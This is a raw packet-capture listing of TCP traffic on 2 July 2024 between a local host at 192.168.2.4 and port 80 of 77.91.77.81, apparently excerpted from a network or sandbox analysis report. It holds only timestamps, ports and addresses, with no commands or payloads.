                                            Jul 2, 2024 08:26:35.234656096 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.234661102 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.234666109 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.234678030 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.234684944 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.234703064 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.234713078 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.234761000 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.234774113 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.234786034 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.234797955 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.234810114 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.234822035 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.234833002 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.234836102 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.234847069 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.234860897 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.234870911 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.234874010 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.234884977 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.234888077 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.234901905 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.234910965 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.234941959 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.294497013 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.294547081 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.294554949 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.294559956 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.294589043 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.294601917 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.294629097 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.294641018 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.294661999 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.294677973 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.294691086 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.294723034 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.294833899 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.294846058 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.294857025 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.294868946 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.294873953 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.294914007 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.295013905 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.295026064 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.295037031 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.295058012 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.295082092 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.295233011 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.295243979 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.295254946 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.295263052 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.295267105 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.295280933 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.295284986 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.295293093 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.295304060 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.295311928 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.295315027 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.295329094 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.295357943 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.326205969 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326225042 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326236963 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326261997 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326275110 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326276064 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.326287985 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326299906 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326303005 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.326313019 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326325893 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326337099 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326345921 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.326349974 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326361895 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.326364994 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326375961 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.326379061 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326391935 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326406002 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.326433897 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.326594114 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326606035 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326622963 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326633930 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326639891 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.326647997 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326662064 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.326689005 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.326725006 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326771975 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.326809883 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326822042 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326832056 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326844931 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326857090 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.326857090 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.326873064 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.326906919 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.327089071 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.327109098 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.327121019 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.327127934 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.327133894 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.327143908 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.327147961 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.327153921 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.327171087 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.327191114 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.327368975 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.327380896 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.327406883 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.327420950 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.327459097 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.327474117 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.327485085 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.327498913 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.327507973 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.327512026 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.327531099 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.327538013 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.327543020 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.327548981 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.327558041 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.327581882 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.327606916 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.328080893 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328093052 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328104973 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328118086 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328129053 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328135014 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.328135014 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.328141928 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328155041 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328160048 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.328166962 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328181028 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328190088 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.328193903 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328202009 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.328226089 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.328599930 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328612089 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328623056 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328634024 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328653097 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.328675032 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.328758955 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328772068 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328783989 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328794003 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.328794956 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328808069 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328819990 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.328838110 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.328845024 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328864098 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328877926 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328888893 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.328891993 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328905106 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328917027 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328918934 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.328928947 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328941107 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328947067 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.328954935 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328958988 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.328968048 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.328988075 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.329011917 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.329715967 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.329727888 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.329740047 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.329751968 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.329760075 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.329763889 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.329783916 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.329796076 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.329798937 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.329808950 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.329816103 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.329823017 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.329834938 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.329847097 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.329859018 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.329859018 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.329873085 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.329883099 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.329888105 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.329895973 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.329907894 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.329910040 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.329920053 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.329931974 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.329940081 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.329955101 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.329972982 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.330296040 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.330311060 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.330322981 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.330334902 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.330334902 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.330347061 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.330353975 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.330379009 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.388921022 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.388951063 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.388961077 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.388977051 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.389000893 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.389020920 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389038086 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389051914 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389065027 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.389095068 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.389170885 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389183044 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389210939 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.389220953 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.389271021 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389282942 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389312029 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.389322042 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.389384031 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389394999 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389406919 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389420033 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.389431000 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.389451981 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.389539003 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389583111 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.389605999 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389617920 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389628887 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389641047 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389656067 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.389659882 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389688969 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.389719963 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.389822006 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389834881 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389847040 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389858007 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.389858007 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.389868975 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.389894962 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420080900 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420115948 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420129061 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420130014 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420152903 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420171976 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420207024 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420219898 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420232058 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420238972 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420253038 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420269966 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420420885 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420433998 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420445919 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420454979 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420459032 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420470953 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420473099 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420490026 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420495033 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420509100 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420538902 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420645952 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420681953 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420701981 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420733929 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420758963 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420770884 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420783043 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420793056 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420805931 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420820951 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420900106 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420911074 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420927048 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.420932055 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420947075 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.420962095 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.421047926 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421060085 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421081066 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.421093941 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.421170950 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421183109 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421195030 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421201944 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.421220064 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.421231985 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421245098 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421252966 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.421257019 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421268940 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.421284914 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.421397924 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421430111 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.421459913 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421471119 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421494007 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.421545029 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421555996 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421570063 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421576023 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.421602964 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.421772957 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421785116 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421796083 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421806097 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.421807051 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421819925 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421819925 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.421833038 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421838999 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.421847105 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421860933 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.421875000 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.421885967 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.421907902 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.422077894 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.422111034 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.422188044 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.422199965 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.422214031 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.422219992 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.422226906 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.422235966 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.422240019 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.422251940 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.422252893 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.422266006 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.422274113 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.422322035 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.422516108 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.422544956 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.422657013 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.422669888 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.422687054 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.422692060 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.422699928 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.422705889 CEST6388180192.168.2.477.91.77.81
